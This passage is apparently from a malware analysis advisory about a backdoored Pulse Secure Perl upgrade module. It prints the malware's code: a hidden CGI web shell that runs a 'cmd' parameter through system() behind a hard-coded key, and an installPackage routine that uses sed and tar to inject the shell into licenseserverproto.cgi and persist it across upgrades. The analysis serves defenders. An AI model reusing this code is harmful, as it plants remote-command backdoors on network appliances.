$innerarchive
###scriptend
###cgistart1
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib";
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib/MIME/Base64";
#use Crypt::RC4;
#use MIME::Base64 ();
#
#sub parse_parameters ($) {
# my %ret;
#
# my $input = shift;
#
# foreach my $pair (split('&', $input)) {
# my ($var, $value) = split('=', $pair, 2);
#
# if($var) {
# $value =~ s/\+/ /g ;
# $value =~ s/%(..)/pack('c',hex($1))/eg;
#
# $ret{$var} = $value;
# }
# }
#
# return %ret;
#}
###cgiend1
###cgistart2
# my $enckey='1234567';
# my $data='1234567812345678';
# my $cipher = RC4($enckey, $data);
# my $encode = MIME::Base64::encode($cipher);
# my $psalLaunch = CGI::param("serverid");
# if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)
# {
# my ($cmd, %FORM);
#
# $|=1;
#
# print "Content-Type: text/html\r\n";
# print "\r\n";
# %FORM = parse_parameters($ENV{'QUERY_STRING'});
#
# if(defined $FORM{'cmd'}) {
# $cmd = $FORM{'cmd'};
# }
#
#print '
#
#
#';
#
#if(defined $FORM{'cmd'}) {
# print "Results of '$cmd' execution:\n\n";
# print "-"x80;
# print "\n";
#
# print $encode;
# system $cmd;
# print "-"x80;
# print "\n";
#}
# print "
";
# exit(0);
# }
###cgiend2
##end_total
--End Patched In Commented CGI Code--
The Pulse Secure Perl script also contains the following suspicious live / uncommented code. This code is designed to modify several Pulse Secure system files using the SED command as well as attempt to install code from within an archive named new-pack.tgz expected to be currently stored on the target system.
--Begin Patched In Commented Code--
sub installPackage {
my ($clean, $console, $html) = @_;
$ENV{"DSINSTALL_CLEAN"} = $clean;
##start_total
##perlstart
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install");
my $statushh = $? % 255;
if( $statushh != 0 )
{
system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm");
system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w K872Bu' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu' ./root/home/perl/DSUpgrade.pm");
system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w Mj1Za' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w 1uMfVB' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/^use DSUtilTable/r Mj1Za' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
system("/bin/sed -i '/^sub main/r 1uMfVB' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
system("/usr/bin/gzip -d /tmp/new-pack.tgz");
system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm");
system("/bin/rm -f K872Bu");
system("/bin/rm -f Mj1Za");
system("/bin/rm -f 1uMfVB");
system("/bin/rm -fr root");
system("rm -f /tmp/new-pack.tgz");
system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
}
else{
system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w Nc3Gy.pm' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/packdecrypt/r Nc3Gy.pm' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/^/#/' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/#//' ./installer/outer-do-install");
system("/usr/bin/gzip -d /tmp/new-pack.tgz");
system("/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install");
system("rm -f Nc3Gy.pm");
system("rm -f /tmp/new-pack.tgz");
system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
system("rm -fr installer");
}
--End Patched In Commented Code--
Analysis indicates this commented code is designed to present a web form to a remote operator, wherein the remote operator can enter commands that will be run locally on the target system. The commented code also has the capability to modify several Pulse Secure system files utilizing the SED command.]]>